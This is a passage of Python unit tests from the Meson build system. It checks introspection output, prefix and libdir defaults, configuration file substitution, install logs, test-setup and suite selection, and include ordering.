def get_meson_log_compiler_checks(self):
'''
        Fetch a list of command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
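        '''
        Run `meson introspect` on the build dir with the given arguments and
        return the parsed JSON output.
        '''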
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
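        'Assert that building again does not rebuild or relink anything'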
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
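        'Assert that an incremental build relinks the given target'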
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
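        '''
        Map an output filename to its target name by dropping the extension
        and any 'lib' or 'cyg' prefix.
        '''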
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats(confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
        # Key error as the keys do not exist
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False, 'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True, 'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value', 'description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10, 'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value', 'description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
# Handles meson format exceptions
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'], 'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_force_fallback_for(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
        # Run the buggy test with a setup whose env will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
        # Run the buggy test with a setup that has no env, so it passes
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
        # Running tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
        # Run tests explicitly using the same setup that is set as the default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
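        '''
        Assert that running the given test command reports exactly
        failure_count failing tests, relying on the exit code being the
        number of failed tests.
        '''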
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
            raise Exception('Could not find someexe and somefxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# Need to run the build so the private dir is created.
self.build()
pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], "-I" + privdir)
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], '-I' + privdir)
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
